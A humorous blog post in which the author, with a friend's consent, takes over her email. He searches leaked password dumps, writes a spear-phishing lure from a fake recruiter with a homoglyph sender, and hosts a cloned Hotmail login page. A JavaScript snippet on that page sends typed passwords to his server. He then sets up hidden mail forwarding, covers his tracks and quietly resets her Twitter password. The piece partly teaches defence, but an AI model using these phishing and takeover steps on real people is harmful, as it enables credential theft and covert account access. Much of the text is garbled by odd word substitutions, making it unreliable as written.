Tumblr Mobile App Hmm Try Again if It Doesnt Work

This blog has moved! This post and other mistakes are now at https://mango.pdf.zone

---

Hullo and welcome to a weblog postal service. I am writing it and you are reading it. Information technology's astonishing what we can do with computers these days.

Several months agone

I'yard at a ramen place with my friend Diana. Diana isn't her real proper noun, but we're going to pretend information technology is because that's what all the absurd journalists do and I wanna fit in too and so don't ruin this for me okay.

I inquire her if it would be okay for me to try and hack all her stuff. She's instantly visibly excited. I explain how this could effect in me seeing everything she's ever put on a computer ever. She tells me she thinks this is going to be "and so good". Nosotros lay down some rules:

• I'll start some time in the side by side 12 months
• No deleting anything she has
• No disrupting her daily life
• Stop asking if she's sure it's okay

Bonus dominion from me: Do this entire thing in stealth way. Don't ever allow Diana know that I've started until information technology's too belatedly.

I hateful, obviously it worked since you and I are having this squeamish little textual discourse correct now. Take my paw metaphorically, and I'll guide you lot through what I tried, my many flubsⁱ, and how to protect yourself from what I didⁱⁱ.

And uh also at the cease Mario's greenish friend is in that location.

Part i: Research

"""Open up Source Intelligence Gathering""""" AKA googling furiously and pretending you went to uni for this

Alright uh I'm pretty sure the commencement thing y'all do when yous're hacking someone is find all their personal information. I'thousand talking about her e-mail, phone number, address, star sign, whether she uses Android or Windows Phone, her birthday, and and then on.

Jeez nosotros're gonna need to know her email accost aren't we?

People put lots of their data on LinkedIn (an information landscape that connects your inbox to people you lot met once in a bar and will forever file under "misc") because it tells them to.

The first thing I see on Diana'southward LinkedIn³ is her electronic mail address. I hastily put on my black hoodie and get my arms a fleck stuck in the sleeves. Hacker voice I'yard _in_⁴. Immediately I sigh and put my hands on my temples like a stressed-out banker. It's a @hotmail.com accost, which surprises me since, well, who's using Hotmail in the year of our lord 2017? I mean geez if yous used hotmail y'all'd miss out on gmail'due south first-class security features heyoooo

                      [x] email address  [ ] the respect of my peers                  

Does she use this email for Twitter?

Yep.

How about her phone number?

I type a bunch of extremely clumsy things into Google. I'm talkin' "dianalastname@hotmail.com phone". A matrix of what looks like zeroes and ones but is really Google search results flies down my screen at about the speed a normal person would scroll at.

At that place's a sign-upwards page for a club she started at her university. The page says "Contact Diana Lastname at dianalastname@hotmail.com or [her phone number]". pew pew got 'em.

          [x] email [x] phone number [ ] the respect of my peers                  

Storing the goods

I paste all these things into a Google Doc - an advanced NSA hacking tool leaked in the recent Shadow Brokers incident.

While googling securely, I observe an old blog of hers from 2009. Information technology has a search box. I immediately slam "pet", "cat" and, "dog" in that search box like it's 2009. The name of someone's pet is oftentimes somehow involved in their security, either as their password or as a "Security""" question or something. I notice the name of her dog from 2009 and vigorously paste it into my Google Doc.

Let's attempt getting into her iCloud account

Armed with my weapons-grade Google Doc, I'yard ready to have a go at trying to get into something of Diana's⁵.

I don't really have a adept reason for going after iCloud, and so if you could just give me a pause for one second

If I click "Forgot Apple ID?" on iCloud, by entering Diana's full name and email accost, Apple tells me her Apple ID, and my screen permanently changes to light-green-on-black text to arrange my new lifestyle.

I'm clicking around and in that location's a section called "account recovery". Sure, I'll have a become.

I can recover the account past clicking "I've uh lost my phone and forgot my password AND locked out of my email". Apple tree says "okay y'all jumbo bozo, fine, only give us a phone number yous Tin access, and we'll SMS you instructions to go dorsum into your account". If I was in a movie doing ~crimes~ and so I'd use a burner phone number. But since this is merely my friend, I apply my real telephone number. I get an SMS from Apple being like "We received your request and volition go dorsum to you within 4 to 6 concern millennia. Our Neo-Future Customer Service Representatives will contact your next-of-kin by whatsoever ways of advice is prevalent at the time."

In that location's some other "account recovery" option that says "use a device you already take". I click this, hoping to get a listing of Diana'due south Apple devices. Instead information technology gives me this:

Daaaaaaaaaaaaaaaammmmit.

I have taken the wrong path in this text risk game.

I've just notified Diana that someone'south trying to reset her account.

For me that would ready off all kinds of warning bells and I'd start furiously investigating what'due south going on with all my accounts considering I'g very cool and collected. Only I'm just going to hope that Diana is a normal homo beingness who is non obsessively paranoid similar me and just ignores all of those pesky automated emails from Apple tree and Microsoft being like "blah blah account blah" or "apathetic apathetic new sign in blah" because I mean who really has time for those we've all got places to get and phones to roll I hateful reallY who'due south gonna pay attending to one liTtlE e-mail when there's a whole Sea of depression quality memes to curlicue past on Facebook? I mean wouldn't you rather see some nice political memes? Newsfeed alert: Some guy from high school has simply been tagged in- oh wow wait this ane's almost your local regime, wowee they've even managed to use the meme font while standing their ground and writing all the text as though it's a trying-to-audio-formal letter from your schoolhouse principal who is still badly trying to combat cyberbullying using nothing just stern words and beginning every sentence with "In regards to…."

There's no manner for me to know if she saw the notification, so I terminate rolling effectually on the floor whispering near low quality memes and get back to piece of work.

Several days later

My phone rings. I can experience the vibration in my pocket and I'm similar "is someone calling me here in the yr of our lord 2022 I can't believe this". I don't recognise the number.

"Hello?"

"Hi, who am I talking to?"

"It's uh Alex."

"Alex?"

"Yeah."

"Alex "?"

"Uh, noooo it's-"

"Ohhhhhhhhhhhhh."

"Wait so who am I talking to?"

It's Diana.

"What's up?", I ask.

She explains to me how she got an email from Apple tree near her business relationship and there was a phone number in it. I tug my neckband several meters into the next room, knocking over several carefully-potted indoor plants.

I hitting intermission on this whole thing, immediately own up, and say "yep, that was me, no need to worry, and I didn't get anywhere, your iCloud business relationship is safe and s- Wait a minute are you telling me you got an email from Apple tree maxim someone tried to reset your account, realised it wasn't you, saw the phone number, and then CALLED it? What was your program if some hacker answered??"

She didn't have a plan. She just called it as soon as she saw information technology, the absolutely off-the-rails lunatic.

We have a nice chat and agree to hang out later. She asks me if I've "hacked her already", and I say "no comment" to preserve my so-far flawless operational security.

Earlier I hang upward, I wanna evidence off my work so far.

"Hey Diana, one more thing"

"Aye?"

"Bank check it out. Did yous ever play a game called…….. Fashion Fantasy Beach?"⁶, I say, coolly and relatably.

Diana freaks out and starts laughing. She'south forgotten well-nigh this game and me reminding her of her business relationship brings back good memories.

"Can you like, discover all the accounts I had on all those game websites?"

Sweet immature Diana. If only it worked that way. Hacking can only exist used for stealing government secrets and ransoming bitcoins. It's just not that unproblematic.

"Past the way, just checking, information technology's all the same okay for me to try and hack all your stuff right?" "SO okay"

Function two: Hackinggggg

At this signal I could reset Diana's countersign for some services by answering her "Security""" Questions with all the information I've gathered.

But, I realise, far too late and to the live studio audience'southward thwarting, that would violate the "don't interfere with her daily life" role of our bargain. If I reset her password, this volition lock her out of whatever account I reset. So, I have to get access stealthily. This will uh heavily involve knowing her password rather than resetting it.

For a long time I consider doing the renaissance-era "send 'em a word doc with a macro in it to become control of their figurer then submit to defcon" but I worry that sugariness immature millennials like Diana don't even utilise Word because they do everything on their phone or Google Docs while simultaneously consuming 17.28 avocados per second look it up.^seven

I guess that makes the virtually valuable thing in her life her electronic mail. If y'all call back earlier, I cunningly divined her email address in Part 1, and so I'm basically halfway there. If I go her email, I can just reset her password for Facebook, Twitter, Fashion Fantasy Embankment, etc. My cyber attack vector cyber entry signal exploit would and then be typing the password into the Hotmail login screen using the Google Chrome Web Browsing Software.

The shady password market

Alright listen we're about to go into password paradise so buckle whatever information technology is you ordinarily buckle. Hackers right, they hack websites. Hoo boy they just love to pop those hypertext pages. Similar Dropbox, MySpace, LinkedIn, Adobe, Tumblr, and many, many more than. They effort to steal everyone's username and password from these sites by making a copy of the database and taking it. Sometimes, the database of usernames and passwords they steal gets released on the ~dark spider web~, for gratuitous or for money. Conveniently, there'south a website (https://haveibeenpwned.com) which lets you type in your email address (not your password you big bozo) and discover out whether any of your passwords accept appeared in these leaked stolen databases.

But…. nowhere does information technology say y'all take to blazon in your email accost. Cunningly, I type dianalastname@hotmail.com, executing hacking.

Hither nosotros can run into a couple of websites Diana has accounts on have been hacked. The just one which had passwords stolen for Diana was Tumblr. So the side by side goal is to acquire the Tumblr database leak from 2013.

Let's go the old Tumblr database

I try to apply my ~hacker connections~ to go a re-create of the Tumblr database. I meet a someone whose forum handle is like d4rkrayne or whatsoever in a local park at 11pm. A colossal vape cloud leads me to him, waiting under a tree, puffing furiously. I look down my 1987 mirror-tinted aviators and say "how much?" (my vocalization comes out several octaves lower and all grizzly like a 40-year-old generic white dude motion picture star with like, juuust the correct corporeality of stubble). He sells me the database on a pile of 442 floppy disks for v,000 credits. What a ripoff. I teleport behind him, say "nothin' personal, child", and hoverboard-kickflip into the night.

…I download the Tumblr database from a publicly accessible, unauthenticated, admittedly non-dark web website. I scramble to get back in my black hoodie, and whip on a 2d pair of sunglasses over the kickoff. I'one thousand in.

Ancient forbidden password rituals

The Tumblr database dump - a hacking Quest Particular - is one long file with lines that look like this:

          coolrelateabledude123@gmail.com:3a1920ceb2791d034973c899907847cb58810808                  

That weird matter afterwards the email is a countersign hash. A countersign hash is like a scrambled upward version of the password. Y'all can't unscramble it. If you lot know the password though, yous can scramble it and go the same omlette, if ya know what I'yard sayin'🍳.

My goal here is to figure out what Diana's actual password is, given that I have her password hash. This procedure is commonly known as "hacking".

These detail passwords are non but hashed, but as well salted^viii. This ways that before each password is hashed, the practiced folks at Tumblr added an extra fleck of text to the stop of each one. So instead of hashing, say, cooldad64, they'd hash cooldad64HNc62V8.

Finding the table salt

There's no official data on what kind of hashes are in Tumblr.txt.

The fully sick attack I want to do is: hashing a large list of passwords I just happen to have lying around wow and checking if any of the hashes match Diana's countersign hash. This is called a "lexicon attack", because the person who invented information technology was really a dictionary. The trouble is, you need to know the salt to practise this.

I google around some more than, bask in the glory of very poorly synthetic sentences on some ~hacker forums~, and ask my ~hacker connections~ in an attempt to find out what the salt is.

But I tin't discover information technology considering fun fact I'yard a total fraud.

Can I become the countersign… without the salt?

And so remember how Tumblr salted the passwords by sticking some random stuff on the cease to thwart wannabees like me?

The trouble is…. They stick the aforementioned affair (in my example, HNc62V8) on the end of every password. This isn't considered the all-time practice hither in the year of our lord 2017, because it ways that users with the aforementioned password take the same password hash. The emails and passwords would await like this:

          markjohnson64@email.com:cooldad64HNc62V8 chicago.tony1@email.com:cooldad64HNc62V8 patriotsfan69@email.com:p@triots69HNc62V8 iamsherlocked.ravenclaw@email.com:Bongo1HNc62V8                  

I search Tumblr.txt for not dianalastname@hotmail.com, but for her password hash. (3a1920ceb2791d034973c899907847cb58810808)

I find more than 20 Tumblr users with the aforementioned password equally Diana aw yeah

          [REDACTED]@electronic mail.com:3a1920ceb2791d0... [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0… [REDACTED]@email.com:3a1920ceb2791d0…                  

This makes me think that Diana's password is probably non very unique, since all these other Dr. Who enthusiasts on Tumblr accept likewise thought of it.

But also. Now I've got 20 other email addresses with the same password every bit Diana. Thanks to the miracle of everyone using the same password for everything, I've got a style to find Diana'south countersign.

I but and so happen Once again WOW WHATTA GUY to take the LinkedIn database dump from when LinkedIn was 360 whirlwind slam hacked in 2012⁹.

Why exercise I care about the dump from the LinkedIn hack, you enquire, fatigued from many gags and desperate for the function where nosotros actually hack Diana?

LinkedIn as well hashed their passwords in 2012, merely they didn't add that freshly basis pink Himalayan rock common salt to them. Also, the countersign hashing method they used is cripplingly insecure¹⁰ (SHA1 for all you extremely online people out at that place). Considering of these flubs, about (>97%) of the passwords in the LinkedIn dump are bachelor in plain text, not even hashed at all thanks to the difficult work and GPU bicycle donations of people in the password cracking community.

I get the xx-ish Tumblr emails who have the same Tumblr countersign equally Diana, and look them all upward in the LinkedIn dump. They're not all in there, but good enough baybee.

                      
[REDACTED]@email.com:qwerty1  [REDACTED]@email.com:killer6  [REDACTED]@email.com:qwerty1  [REDACTED]@email.com:qwerty1                  

More than than 80% of them have the same LinkedIn password. (Which we will say is qwerty1.)

This has gotta be Diana's password from Tumblr in 2013. Since all these people had the same password on Tumblr, and most of them take the password qwerty1 on LinkedIn, information technology's very probable that Diana's Tumblr password is qwerty1.

I try to log in to her Hotmail account with the password qwerty1.

"Incorrect password"

Wait delight this was supposed to exist easy please no why is it like this don't do this to me

Oh come up on I was supposed to exist hacking a normal person who uses the aforementioned password for everything this isn't fair. There are entire criminal industries built on the idea that people utilise the same password all over the place because nobody cares enough to retrieve more a few passwords considering they've got things to scroll on their phone okay.

Somehow, Diana is one of the rare few people who is non a security expert merely has more than than one password for her stuff.

I effort this password on a few of her other accounts (Facebook, Twitter, iCloud) and it works on none of them¹¹.

On Facebook, I'thou conveniently informed that this countersign was her password 5 months ago, but isn't whatever more.

Looks like I but missed out. The plot thickens audibly.

This was supposed to be the part where I say "and so I logged into her email 100% stealthily", equip my 3rd sequent pair of sunglasses, and move on to the next scrap. But alas, Diana was only in one leaked password listing on haveibeenpwned.com at the time, so there goes that.

Fiiiiiiiiiiine whatever I don't fifty-fifty intendance I'm non crying, you're crying. Fourth dimension to do this the one-time fashioned manner. And past "the onetime fashioned style" I of course mean "the manner government hackers do information technology".

Part 3: Hackinggggg (once more)

Social technology

Alright so nosotros're simply going to fox her into telling me her password. Is that cheating? Basically. Merely absolutely I'm going to do it anyway.

To go into her email, I demand to know Diana's e-mail password. Resetting the password won't work (since that would interrupt her life by locking her out of her email). I don't really wanna follow her effectually, man-in-the-middle attack her telephone or laptop when it connects to insecure WiFi and steal her browser session, so that leaves us with: phishing.

You may have heard of "phishing", the procedure of emailing someone and tricking them into doing something, like giving you lot their countersign.

At present, hold up bucko, you lot're probably thinking of the kind of phish where someone says "practiced mean solar day sir I nigerian prince give you $1 one thousand thousand dollars USD u are royalty 2 me" etc. etc.

Or maybe you're thinking of someone sending an e-mail that says "[heavy animate] pls clikc on my urls http://click.here.to.go.ripped.in.three.weeks.verylegit.link/6x9M;PjxrY=WrS33n$Hcracked__767windows8+bitcoin.gpg.exe"

But with nada more than than paperclips, chewing gum, a unmarried fidget spinner, and an avant-garde psychology degree, nosotros tin not but steal Diana's countersign, but do it without Diana realising she's been tricked.

Manus-crafting artisanal phishing emails to sell at the Sunday markets

Permit'due south write down what nosotros desire to do:

• Get Diana'due south email countersign
• Don't allow her realise that the electronic mail is not legit

Hmm I guess in that location were only two dot points uhh sorry that doesn't seem worth having dot points at all ummmm

And so anyway the trick to phishing is that y'all don't want to engage the victim's attention. You lot want them to interact with your email mindlessly, without thinking it's a large bargain. Kinda similar how you click through email notifcations from Twitter (or anything that sends you email notifications) without actually thinking nearly the email, because yous're thinking near what awaits on the other finish.

The other way, rather than distracting the victim, is to misdirect them. Yous give them something that's mode more interesting to pay attention to than your dodgy link. Mutual examples of this include emails that say "OMG your account has been HACKED, log in here to gear up information technology".

But of class, you log in to a fake website which steals your password.

Wow actually that sounds pretty¹² easy¹³ doesn't it? Allow's endeavor that then.

I'll make an email that says "Your Microsoft Account Has Been Hacked And Uh If You Don't Log In Now Information technology Will Go Deleted So Uh Yeah You Meliorate Log In".

Instead of designing my ain legit-looking Microsoft email, it's easier to just copy one that Microsoft has already made. I search my hotmail account¹⁴ for an automated email from Microsoft.

I use the incredibly cutting edge "Inspect Element" feature of the popular hacking software, Google Chrome, to edit the text of the electronic mail but keep the wait. Equally I right click and hover over "Inspect Chemical element", my laptop instantly explodes, I become root access to Microsoft, I'm added 50 times to every NSA watchlist, my text permanently changes to green-on-black, and I'1000 accepted to DEFCON.

Now it looks like this:

I can't transport the e-mail from my email account, because I'm not a total amateur. I use the pop hacking tool The Microsoft Sign Upwards Screen to make the hotmail account "msftacountteam@outlook.com". If you look closely, "account" is spelled wrong. I used "msft" because it wouldn't permit me include the word "microsoft".

I try to annals an account with first name "Microsoft" and last proper name "Account Team". The signup course doesn't let me. Blast. Thwarted by Microsoft lackeys. Probably, Microsoft doesn't let you take "Microsoft" in your account proper noun to prevent, uh, exactly what I'm doing. Hmmm. I don't really desire to have a typo in the name, like "Micorsoft", since Diana might find that.

Instead I, a level 8 Wizard, cast a spell to bandy the "o" characters in "Microsoft" for a special unicode character (like an emoji but much worse) that looks exactly similar an "o". It's not, of course, it'south our quondam friend, the Greek letter "Omicron". Here's the ii pals side-by side:

οo

Awww, only await at 'em having a nail. These piddling guys might look unlike in the font your device is using, but in the hotmail web UI font they look juuuust right👌.

So at present, my account's proper noun isn't "Microsoft", Information technology's "Micr[omicron]s[omicron]ft", according to the lawmaking that checks whether you lot have a valid name when you sign up for an account.

I'thousand certain you're wondering how this whole process ends up with me getting Diana's countersign, laughing manically in my comically giant leather chair. After she clicks the link in my legit looking email, she'll be asked to log in¹⁵. The folio she goes to will wait merely similar the Hotmail login page, but it will really be a copy that sends the countersign to me.

How tin can I make such a folio? Well I'll clone the real page, register a domain that looks similar to login.live.com, host my cloned page in that location, and then on. Juuust kidding, the static website hosting service Aerobatic happens to also be an first-class phishing service.

I tin can register [annihilation].aerobatic.io, and deploy my static HTML to that domain with their command line tool for gratuitous.

Shout outs to Aerobatic for the smooth smoothen phishing UX. Use the referral code DIANA to be immediately reported to the NSA.

I copy the existing login.live.com page, and pre-fill up dianalastname@hotmail.com in the "email address" field. I deploy this page extremely trivially to login-live.aerobatic.io, and equip my fourth pair of sunglasses (don't worry I've earned it). This well-nigh looks right, just the real Hotmail login form has a agglomeration of stuff afterwards the / in the URL, then I re-create/paste some of that skillful stuff too¹⁶.

Here's the verbal URL, if you're interested. Also if you're not interested. It's gonna exist there either way.

          https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.alive.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin        

Perfect¹⁷. This looks like enough to fool a cursory glance, and that's all we need baybee. Maybe she'll think "why practice I take to log in again? I'm already logged in to my email?", simply the email asks for a "Secure Login" (whatever that is).

Here'due south what the login folio does:

          // When the Login button is clicked or Enter is pressed $('#passwordForm').on('submit', function() {     var password = $('#password').val();      // Create an image with a URL that points to my website.     // The browser will request this URL in an attempt to load the image (which will fail since that URL doesn't be)     $('body').append('<img src="a-website-i-own.com/DIANA?'%twenty+%20password%20+%20'" alt="paradigm">');      // Wait one second to simulate loading time (adjust to 0.1s if y'all don't live in Australia sigh), and and then get to the real Hotmail login page.     // Diana volition already exist logged in, so this will seem to her exactly like she's just logged in to hotmail.     window.setTimeout(part() {         window.location = 'login.alive.com'     }, one thousand);     return false; }                  

This works by sending her password to me when she clicks "log in". The password is sent a website of mine. So I send her along to the real Hotmail, and so it looks just liked she logged in. The website logs everything that gets sent to information technology, and so I can then search my logs for "DIANA" to find the log containing the password.

This is all what I'm hoping for, anyway. The email says she has 48 hours to comply to create time pressure. Telling you that you accept to exercise something correct now is a common tactic to make you think instinctively and irrationally.

I login to my faux "Microsoft Account Team" hotmail business relationship, send the email to dianalastname@hotmail.com and wait for her to take herself a ruby-hot browse.

Well-nigh 12 hours later, I cheque my logs to see if she's typed her password.

She doesn't.

I wait some other 12 hours.

Even so nothing.

I ship the e-mail over again, wincing slightly, this time saying she has 24 hours.

Still zip.

Well damn

I guess that didn't work. She must have but ignored the electronic mail as uninteresting¹⁸

I try to remember of non-phishing means to get her countersign but really phishing is just too skilful. The prissy thing about being the attacker is that y'all can put your eggs in many baskets. Diana has to defend confronting all of my eggs, and I've got baskets for days. Time for round 2.

Sniper scope targeted phishing blap blap

I reach under my desk-bound, unwrap a package addressed to "Managing director OF CYBER, NSA", slide out a yellow and black canister labelled "Mainland china", break open the safe seal, and use safety tongs to extract the following red-hot phish.

This time, instead of using a generic idea that would work on anyone ("suspicious account activity"), we'll make something special but for Diana. Kinda like mitt-knitting a beanie, but comparatively less wholesome.

I Google "google docs microsoft equivalent" and come across I dunno SkyDrive or SkyDocs 365 Pro or something or OneDrive await I dunno just look information technology's Google Docs but Microsoft and then adept enough for me.

I brand a convincing looking resume (in Google Docs, of grade) and copy it into a OneSkyCloudDrive 364/ii Days: Final Remix HD+ Doc.

Let's play: who's gonna send this physician to Diana?

I find a local company that's probable to legitimately want to talk to Diana, and search for a recruiter who works there on LinkedIn. I make someone with the same get-go name, merely a different last name as a real recruiter from this company¹⁹.

I make a fake gmail account called Kathleen Wheeler, using a stock photograph of a middle-aged western woman as the profile photo.

Here's what Kathleen is going to electronic mail Diana.

Looks legit riiiight?

The questions at the cease are simply some garbage I fabricated up, simply the betoken of them is to distract Diana right after she reads the "click here".

I put Diana's real phone number at the finish to make it more than convincing. This email is obviously meant but for her. Information technology as well makes sense for the telephone number to be at that place, since presumably whoever listed Diana as a referee gave the telephone number to Kathleen.

At the time she types her countersign, we want Diana to be thinking of what's on the other side of the login screen.

The delicious allurement hither is that this email says "someone said they know you", and you accept to read the resume to find out who. Aw, but the resume is behind a pesky link. ~Estimate you better simply click on it~. LinkedIn also does this in their, um, "engagement" emails which say things like "you have ii new messages", but not who they're from or what they say.

When Diana clicks on the link to the "resume", it will take her to the same imitation login page (with her e-mail pre-filled) every bit earlier. When she types annihilation in the password box, the site volition await one 2d and then ship her to the Microsoft Google Doc™. The one-second look is to simulate Australian internet speeds HAHAHAHAhahahahahah this sucks

She'll detect that she doesn't know the person, probably because they're completely made up. They have work experience at real workplaces nearby, and went to the aforementioned university as Diana at around the same time, then hopefully their resume passes a cursory glance^xx.

Finding an unfamiliar resume is a sufficient, only not especially satisfying decision to the adventure of the weird electronic mail from Kathleen. Simply of course, by and so it's too late, I'm sitting in my ivory tower surrounded by passwords.

I make sure to send it during business hours, from "Kathleen""", pull a necklace from nether my shirt dramatically, kiss it, await upwardly at the sky, and wait.

Waiting

That dark, I cheque my website's logs for whatsoever passwords from my fake Hotmail login form.

          - - [[date]:xvi:32:30 +1000] "GET /DIANA?qwerty1 HTTP/1.one" 404 4702 "https://login-live.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=http...." "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.half-dozen (KHTML, like Gecko) Version/10.0 Mobile/14D27 Safari/602.1"                  

"Got it!"

….. is what I remember, at first.

Specially keen readers will have noticed that the countersign Diana has typed into my fake Hotmail login page is… the same countersign as we found for her in the Tumblr database.

This is not her Hotmail password, and everything is terrible.

From this we can describe two conclusions:

• Diana doesn't know what her Hotmail password is
• She now thinks her hotmail password is qwerty1, since she typed it into my fake login page which accepts whatever password, and information technology worked

I almost gave up at this indicate, but a final-minute outburst of desperation/frustration/last destination helped me piece of work up the courage to accept another shot here in Act 3.

Past this point my fake Microsoft Business relationship Squad electronic mail account has been soft-banned by the good people at William Gates Inc. for sending and so many obvious phishing emails. I have to prove I'm a human and add my phone number to the business relationship, and so it unlocks and I tin edit the Microsoft Google Doc.

I hastily make a new fake resume of significantly lower quality than the first i, and make a crucial change to my simulated login page.

My simulated login page at present says "incorrect password" no matter what you type in the first two times you try typing something. If you type qwerty1, then the password counter doesn't go up²¹.

What exercise people do when they become a "wrong password" error? Effort all of the three or 4 passwords they use for everything, of course.

I desire to try and become Diana to type qwerty1, get a "wrong countersign" fault, and then just unload all her passwords into my form.

Diana replied to my failed email with "deplorable I don't know this person", and so Kathleen replies with, "wrong resume lol, here's the new one" even though this makes zero sense in the context of our e-mail exchange. I'k hoping Diana will only be busily checking the electronic mail on her phone and not really notice this discrepancy.

I use a dissimilar font from the "form" when typing as Kathleen to make it look like this is a form that gets re-create/pasted to every candidate. This makes Kathleen seem like she does this all the fourth dimension in her big bustling, 100% real office. I also do my all-time to imitate the tone of a polite but stressed out office worker. Y'all can almost hear the part politics. It'south called method acting.

Time to stressfully wait for Diana to check for her electronic mail again, and then at present would be a good time to read out some donations.

Hours later

It works.

                      
108.162.249.169 - - [12/May/2017:xiii:39:43 +thousand] "Go /DIANA?wertyu2 HTTP/i.ane" 404 4702  "https://docs-login-alive.aerobatic.io/?passive=1209600&continue=https%3A%2F%2Faccounts.live.com%2FManageAccount&followup=https%3A%2F%2Faccounts.live.com%2FManageAccount&flowName=GlifWebSignIn&flowEntry=ServiceLogin"  "Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_1 like Mac OS X) AppleWebKit/602.4.half-dozen (KHTML, like Gecko) Version/ten.0 Mobile/14D27 Safari/602.1"                  

I go only one countersign from Diana (typed multiple times), but it's dissimilar to the last 1 I got (qwerty1)²².

I look until she'south asleep based on her Facebook Messenger terminal active time and log into her email using the elite hacking method of typing her countersign into the box.

The reason I waited until she was asleep was in case Hotmail emailed the account saying "New Sign In". It doesn't, and I'm rewarded with her electronic mail inbox screen in its full glory.

Angels sing softly to a higher place me. A small-scale yellow bird lands on my shoulder and begins to chirp softly. I get several emails from the bullies in high school - they're really sorry and they've done a lot of soul searching and they want to go far upward to me and I should look premium fruit baskets on my doorstep in the coming months. Global warming halts.

"But that would never piece of work on me"

Information technology would tho.

Maybe some of you in the audience are thinking "Wow, this Diana person must be pretty dumb to fall for that. Good thing I'thou a web browsing prodigy with a colossal brain and many opinions, and so that would never happen to me."

The thing is, right now you're very alert, because you're reading a blog post near hacking. If you lot were just reading your e-mail, half-paying-attending on a train as normal, security wouldn't likely be on your heed. If sending pull a fast one on emails is good enough for whoever the NSA, are emailing, then information technology's probably skilful enough to work on yous and me.

I gauge what I'one thousand saying here is "don't go shaming phishing victims plz".

Anyway sorry back to haͅck͐i̥n̏g̜

Part 4: HACKER Vox I'K IN

I immediately endeavor Diana's email password (wertyu2) on her Facebook, Twitter, LinkedIn, iCloud, and on her other email addresses. None of them work because I've chosen someone with slightly higher up average personal security to target.

The obvious next stride is to forward all her email to me (so I don't have to keep logging in to her email). Before I set upwards e-mail forwarding, I endeavour information technology out on a hotmail business relationship I command. I'm testing to see if setting up "frontward all your email to this accost" sets off whatever notifications I'll take to delete, or notifies y'all in whatever other way.

In gmail, when you forrard all your mail to another email address, the other accost gets emailed a code, and as well a big carmine bar appears on your gmail inbox saying "you're sending literally all of your email to this accost FYI" for 7 days.

I type in my email address into my test hotmail account, and click "forward all my mail here pls". Information technology saves. I check both email inboxes for a notification email. In that location isn't one. I've just backdoored this e-mail account and no fuss has been made whatsoever. OH well at least hotmail has NoMansSkyDrive two.8 Remastered Twoscore Online or whatsoever.

An interlude from Diana

Diana replies to my email saying she doesn't know this person either. She's a little suspicious, so I endeavor and say something that volition close the conversation.

Diana doesn't reply.

Hey remember how you tin search email?

Now that I take Diana's electronic mail password, I want to search her electronic mail for more passwords, and use those passwords to become more, then on, like a Real hacker.

Try going to your e-mail and searching for "countersign". Betcha there's passwords in there.

In Hotmail, when you go to search something, the last 5 searches you've washed pop up as suggestions.

This ways that if I search for "password", Diana will discover "password" in the search history. That would be a really lame way to get defenseless.

To get around this, I: * Wait until Diana is comatose * Write down her last 5 searches * Search for "password" * Look at the results * Search for her concluding v searches again, in opposite order

Since but the terminal 5 searches are shown, past repeating the searches in reverse social club, the search history looks exactly the aforementioned.

Much to the disappointment of the alive studio audition, I don't observe annihilation particularly useful. I discover the 2 passwords I already know (qwerty1 and wertyu2) several times, and one other password which I again try on all her accounts, just doesn't work </3.

I hang out in Diana's e-mail for several months. Every so often I check it. I discover her signing a contract for a task, and so I get her passport number, signature, telephone number, bank account number, and basically everything I'd demand to impersonate her. I don't really^{23 24 25} want to impersonate someone'due south government-issued ID, then I leave this alone.

At one stage, I'm browsing through striking political discourse platform and stance conveyor belt twitter dot com, and I notice Diana tweet something along the lines of "Finally spent my solar day off consolidating my iv electronic mail accounts into ane, feels skillful to be organised".

I panic a little. Have I been found out? I log in to dianalastname@hotmail.com (which still works, thankfully) and see that all her emails take been archived. I poke around in the email forwarding settings, and I see that things have changed. Her email is no longer being sent to my email address, it's existence sent to dianalastname42@gmail.com (presumably the new email that Diana now frontwards all her mail to).

This raises an important question. How did Diana not notice my e-mail address in the "forward all mail to:" box? Did she see it, and just mindlessly delete it?

(When I interview her after all this, she says yep, that's exactly what she did.)

What now?

Normally information technology would stop hither. Mission accomplished. I'thou in control of her email. I could crusade catastrophic damage to Diana's life if I wanted to (I don't btw). In that location's potential for endless gags, limitless goofs, unlimited japes, infinte jests, etc.

But.. information technology seems like an awful shame to but… leave. That'southward why I commencement piece of work on a fiddling' somethin' called

Operation Luigi

Everybody merely LOVES Mario's green friend Luigi! He's a Certified Skilful Male child! Merely wait at that boyish charm.

Why non brighten up YOUR social media presence with this game male child?

Well gee I'm sold after that delightful interlude from our sponsor, The Nintendo. Permit's get Diana some uncut, Colombian Luigi.

Footstep i: Become in to her Twitter and LinkedIn

So, I want to:

• Go access to Diana'due south Twitter
• Not lock Diana out
• Non warning Diana that I'm up in her stuff

I could but phish her again for these passwords, but I'm already a salty old fisherman by this point.

Since I have admission to her email, I could reset her Twitter password. The problem is, when you reset your Twitter countersign, y'all go logged out of Twitter in Chrome, the Twitter app, and anywhere else you might exist logged in. So you accept to retype your new countersign. I of my rules was that I wouldn't interrupt Diana's life, so I demand her to be able to log back in to Twitter when I strength her to log out.

I come with a simple 8-stride plan to do this, with 4 easy repayments of 2 steps.

1. Wait until Diana is asleep
2. Disable Diana's email forwarding
3. Get to Twitter and reset her password
4. Click the password reset link that gets emailed to her
5. Set her password to qwerty1
6. Delete the password reset email
7. Delete the "New Twitter Sign In" email
8. Re-enable email forwarding

The combo move in this is setting her countersign to qwerty1. When I phished her email password, she tried to log in to her email with qwerty1 even though that's non her countersign. This tells me that she thinks her password for everything is qwerty1, or at least, that's what she'll attempt if she's not sure. The technical term for this is next-level mindgames💻💻💻.

I practise the steps higher up, and I'thou now logged in to Diana's Twitter account. I tigheten upward her Twitter security settings considering I'm a Skillful Boy. I Hope that Diana will exist able to log back in besides, and not wonder why she suddenly got logged out. I expect stressfully for her to tweet something, and subsequently a day or so she retweets a cute doggo, so we're practiced to go.

Now I want to exercise the aforementioned thing on popular dating website LinkedIn. This will involve signing Diana out of LinkedIn on all her devices, and I don't want her to get too suspicious, so I await a calendar week. I do the same process every bit with Twitter. This time I don't even wait until Diana is comatose, because I'chiliad young and invincible.

As I'm setting Diana's password on LinkedIn back to qwerty1, LinkedIn doesn't permit me.

